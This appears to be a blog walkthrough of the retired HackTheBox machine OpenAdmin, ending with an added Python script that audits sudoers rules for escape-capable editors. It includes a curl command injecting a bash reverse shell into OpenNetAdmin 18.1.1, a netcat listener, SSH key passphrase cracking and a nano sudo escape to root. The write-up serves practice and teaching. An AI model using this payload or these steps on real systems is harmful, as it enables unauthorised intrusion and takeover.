OpenAdmin (Linux-based) Machine Walkthrough HTB


Hello Awesome Hackers, nice to meet you all. This blog will focus on a retired box on HackTheBox.

Machine - IP:


```
NSE: Loaded 125 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:31
Completed NSE at 21:31, 0.00s elapsed
Initiating NSE at 21:31
Completed NSE at 21:31, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:31
Completed Parallel DNS resolution of 1 host. at 21:31, 0.00s elapsed
Initiating Connect Scan at 21:31
Scanning [1000 ports]
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Increasing send delay for from 0 to 5 due to max_successful_tryno increase to 4
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 69.70% done; ETC: 21:32 (0:00:15 remaining)
Completed Connect Scan at 21:32, 52.39s elapsed (1000 total ports)
NSE: Script scanning
Initiating NSE at 21:32
Completed NSE at 21:32, 15.85s elapsed
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Nmap scan report for
Host is up (0.63s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Ubuntu Default Page: It works

NSE: Script Post-scanning.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 68.46 seconds
```

Open Ports

-> Port 22 - SSH
-> Port 80 - HTTP

Now I open this IP address in the browser; it shows the Apache2 default page.

Directory Brute Force

```
gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x php,txt,html -o gobuster-root-php_txt_html
```

```
/music (Status: 301)
/artwork (Status: 301)
/sierra (Status: 301)
```

Coming to the login page, we got the “OpenNetAdmin” version. Let’s recon the “ona”.

Now I see that the version is v18.1.1, which it warns is not the latest.

Now I try to find the exploit using searchsploit.

Run the netcat command:

```
nc -nvlp 443
```

Now I try to get the shell using this curl command:

```
curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/ 0>%261'&xajaxargs[]=ping"
```

I get the shell.

Privilege Escalation

Now my task is to go from www-data to jimmy. I started the enumeration and checked everything like config files, PHP files, etc., and I got some juicy data.

So here we got some credentials for the database.

Now let’s check how many users are present in the home directory of this machine. Here we see there are two users present on the machine: "Jimmy" and "Joanna".

Let’s try to connect over SSH as the user jimmy with the above password, which we found in the database_settings.inc.php file. I successfully logged in.

Now I found an interesting directory inside /var/www/: /internal.

The PHP must be hosted using a web server, and a particular port must be used.

Now I copied the private key back to my box. I used ssh2john, which converts the key into a format that John the Ripper can understand, and cracked the passphrase.

```
ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

Once the password is cracked, here is the password:


Now I gave permissions to id_rsa:

```
chmod 600 id_rsa
```

Now I try to log in over SSH:

```
ssh -i id_rsa joanna@
```

Enter the passphrase and hit Enter. We are successfully logged in. Now we use this command:

```
sudo -l
```


When inside nano, press Ctrl+R followed by Ctrl+X. Nano will prompt you for the command you want to execute. The command essentially opens a shell on the box as root.

We get the shell. Here are the flags.
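
The last step works because a sudo rule lets an unprivileged user run an interactive editor as root. As an added example (not part of the original walkthrough), this Python script audits sudoers-style rules for such programs; the program list, user names and sample rules are constructed assumptions, and the parser handles only plain user rules.

```python
import os
import re

# Programs with a built-in way to run commands (illustrative list, an assumption).
SHELL_ESCAPE = {"nano", "vi", "vim", "less", "more", "man", "ed", "emacs"}
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")
RUNAS_RE = re.compile(r"^\(([^)]*)\)\s*")
SKIP_RE = re.compile(r"^(#|Defaults|(User|Runas|Host|Cmnd)_Alias\b)")

# Constructed sudoers fragment; users and rules are hypothetical.
SAMPLE = """\
Defaults env_reset
alice  ALL=(root) NOPASSWD: /bin/nano /etc/motd
bob    ALL=(root) NOEXEC: /usr/bin/less /var/log/syslog
carol  ALL=(root) /usr/bin/systemctl restart nginx, /usr/bin/vim /etc/hosts
dave   ALL=(root) sudoedit /etc/hosts
"""


def audit_sudoers(text):
    """Flag user rules that run an escape-capable program without NOEXEC."""
    findings = []
    for line in map(str.strip, text.splitlines()):
        if not line or SKIP_RE.match(line) or "=" not in line:
            continue
        who, spec = line.split("=", 1)
        runas, nopasswd, noexec = "root", False, False
        # Split on commas outside "(...)"; runas and tags carry over to later commands.
        for item in re.split(r",(?![^(]*\))", spec):
            item = item.strip()
            if (m := RUNAS_RE.match(item)):
                runas, item = m.group(1), item[m.end():]
            while (t := TAG_RE.match(item)):
                tag, item = t.group(1), item[t.end():]
                nopasswd = {"NOPASSWD": True, "PASSWD": False}.get(tag, nopasswd)
                noexec = {"NOEXEC": True, "EXEC": False}.get(tag, noexec)
            if not item or item == "ALL":
                continue
            if os.path.basename(item.split()[0]) in SHELL_ESCAPE and not noexec:
                findings.append({"user": who.split()[0], "runas": runas,
                                 "command": item, "nopasswd": nopasswd})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE):
        print(f)
```

In the sample, the `alice` and `carol` rules are flagged; the `NOEXEC:` rule and the `sudoedit` rule are not, which are the two sudoers mechanisms for letting a user view or edit a file without handing over a root shell.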

Thank you for reading.


Twitter: https://twitter.com/nagasaikiran010

Linkedin: https://www.linkedin.com/in/nagasaikiran010/